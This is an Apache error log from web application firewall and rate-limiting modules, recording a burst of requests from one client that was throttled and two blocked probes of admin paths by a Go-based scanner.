[Tue May 26 20:00:30.371787 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1g7gAAAOI"]
[Tue May 26 20:00:30.372227 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswEQQAAAHc"]
[Tue May 26 20:00:30.373248 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gpQAAAJU"]
[Tue May 26 20:00:30.373568 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gpgAAAJA"]
[Tue May 26 20:00:30.376140 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswESwAAAEk"]
[Tue May 26 20:00:30.378495 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswETgAAAHQ"]
[Tue May 26 20:00:30.380053 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswETAAAACU"]
[Tue May 26 20:00:30.381396 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1goAAAAPE"]
[Tue May 26 20:00:30.383036 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswERQAAAAc"]
[Tue May 26 20:00:30.389825 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1grwAAAJY"]
[Tue May 26 20:00:30.392257 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gqwAAAPw"]
[Tue May 26 20:00:30.401574 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1g8wAAAOg"]
[Tue May 26 20:00:30.434664 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1g_AAAALI"]
[Tue May 26 20:00:30.437918 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1g-QAAALc"]
[Tue May 26 20:00:30.470054 2026] [security2:error] [pid 93576:tid 93798] [client 103.163.220.23:45881] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/admin/function.php"] [unique_id "ahWuhmDRMqfxdEDkoswEoQAAAFY"]
[Tue May 26 20:00:30.541248 2026] [qos:error] [pid 106517:tid 106669] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhoZZc2DoU1lPnP1hggAAAJg
[Tue May 26 20:00:30.542420 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhoZZc2DoU1lPnP1hgwAAANs
[Tue May 26 20:00:30.542498 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhmDRMqfxdEDkoswEzgAAAGQ
[Tue May 26 20:00:30.542508 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuhmDRMqfxdEDkoswEzwAAAGE
[Tue May 26 20:00:30.542975 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEzQAAABE
[Tue May 26 20:00:30.544335 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhmDRMqfxdEDkoswE0QAAABk
[Tue May 26 20:00:30.544570 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhoZZc2DoU1lPnP1hhgAAAK0
[Tue May 26 20:00:30.558117 2026] [qos:error] [pid 106517:tid 106677] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hiQAAAKA
[Tue May 26 20:00:30.586094 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE1AAAAHk
[Tue May 26 20:00:30.589321 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE1gAAAAE
[Tue May 26 20:00:30.738455 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE2gAAAGw
[Tue May 26 20:00:30.740414 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE2wAAAFc
[Tue May 26 20:00:30.748979 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE3AAAAHQ
[Tue May 26 20:00:30.749944 2026] [qos:error] [pid 106517:tid 106725] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hlAAAAM8
[Tue May 26 20:00:30.755429 2026] [qos:error] [pid 106517:tid 106774] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hlQAAAQA
[Tue May 26 20:00:30.758223 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE3gAAAEA
[Tue May 26 20:00:30.760903 2026] [qos:error] [pid 106517:tid 106696] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hlgAAALI
[Tue May 26 20:00:30.761496 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE3wAAADI
[Tue May 26 20:00:30.767658 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE4AAAAFg
[Tue May 26 20:00:30.768045 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hlwAAANI
[Tue May 26 20:00:30.888723 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE4gAAAG8
[Tue May 26 20:00:30.892524 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE4wAAABI
[Tue May 26 20:00:30.901503 2026] [qos:error] [pid 106517:tid 106675] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hmgAAAJ4
[Tue May 26 20:00:30.902951 2026] [qos:error] [pid 106517:tid 106652] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hmwAAAIc
[Tue May 26 20:00:30.908971 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE5QAAACo
[Tue May 26 20:00:30.910015 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hnAAAANk
[Tue May 26 20:00:30.915960 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE6QAAAFw
[Tue May 26 20:00:30.921580 2026] [qos:error] [pid 106517:tid 106660] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hngAAAI8
[Tue May 26 20:00:30.923008 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswE6wAAAG4
[Tue May 26 20:00:31.013305 2026] [security2:error] [pid 93576:tid 93753] [client 103.163.220.16:58209] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/network/"] [unique_id "ahWuh2DRMqfxdEDkoswE7QAAACk"]
[Tue May 26 20:00:31.039195 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE7gAAAAM
[Tue May 26 20:00:31.043634 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE7wAAABE
[Tue May 26 20:00:31.050124 2026] [qos:error] [pid 106517:tid 106668] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1hoQAAAJc
[Tue May 26 20:00:31.051486 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1hogAAANs
[Tue May 26 20:00:31.056635 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE8AAAABk
[Tue May 26 20:00:31.059842 2026] [qos:error] [pid 106517:tid 106661] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1howAAAJA
[Tue May 26 20:00:31.067361 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE8QAAAHE
[Tue May 26 20:00:31.072991 2026] [security2:error] [pid 106517:tid 106729] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hjwAAANM"]
[Tue May 26 20:00:31.075586 2026] [qos:error] [pid 106517:tid 106705] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1hpAAAALs
[Tue May 26 20:00:31.078429 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE8gAAAHM
[Tue May 26 20:00:31.189663 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE9AAAAFo
[Tue May 26 20:00:31.193785 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE9QAAACA
[Tue May 26 20:00:31.199726 2026] [qos:error] [pid 106517:tid 106659] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1hqAAAAI4
[Tue May 26 20:00:31.199777 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1hpwAAAN8
[Tue May 26 20:00:31.206852 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE9gAAADc
[Tue May 26 20:00:31.209515 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:53552] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE9wAAACY
[Tue May 26 20:00:31.209839 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1hqQAAAJY
[Tue May 26 20:00:31.219291 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE-AAAAEk
[Tue May 26 20:00:31.229917 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh4ZZc2DoU1lPnP1hqwAAAPM
[Tue May 26 20:00:31.233129 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuh2DRMqfxdEDkoswE-QAAACw
[Tue May 26 20:00:31.281922 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswEVgAAAD0"]
[Tue May 26 20:00:31.282173 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswETwAAAFA"]
[Tue May 26 20:00:31.286592 2026] [security2:error] [pid 106517:tid 106672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1g-wAAAJs"]
[Tue May 26 20:00:31.291010 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswEWwAAAGc"]
[Tue May 26 20:00:31.294705 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1g_QAAAIY"]
[Tue May 26 20:00:31.299613 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hEwAAAQE"]
[Tue May 26 20:00:31.299646 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswESgAAAGo"]
[Tue May 26 20:00:31.301065 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hBQAAAMw"]
[Tue May 26 20:00:31.303591 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hAQAAAL0"]
[Tue May 26 20:00:31.313320 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hDgAAAJ0"]
[Tue May 26 20:00:31.316093 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hAgAAAPg"]
[Tue May 26 20:00:31.321639 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswEXwAAAA0"]
[Tue May 26 20:00:31.334132 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswEbQAAADA"]
[Tue May 26 20:00:31.341703 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswEZgAAAGI"]
[Tue May 26 20:00:31.345002 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswEZQAAAEM"]
[Tue May 26 20:00:31.346151 2026] [security2:error] [pid 106517:tid 106751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hEgAAAOk"]
[Tue May 26 20:00:31.362584 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hHAAAANo"]
[Tue May 26 20:00:31.362887 2026] [security2:error] [pid 106517:tid 106686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hXQAAAKg"]
[Tue May 26 20:00:31.369771 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hGwAAAKQ"]
[Tue May 26 20:00:31.372027 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hEQAAALM"]
[Tue May 26 20:00:31.376715 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhoZZc2DoU1lPnP1hWAAAAM0"]
[Tue May 26 20:00:31.377059 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhmDRMqfxdEDkoswErAAAAG0"]
[Tue May 26 20:00:31.380367 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hDQAAALw"]
[Tue May 26 20:00:31.384762 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswEewAAAE8"]
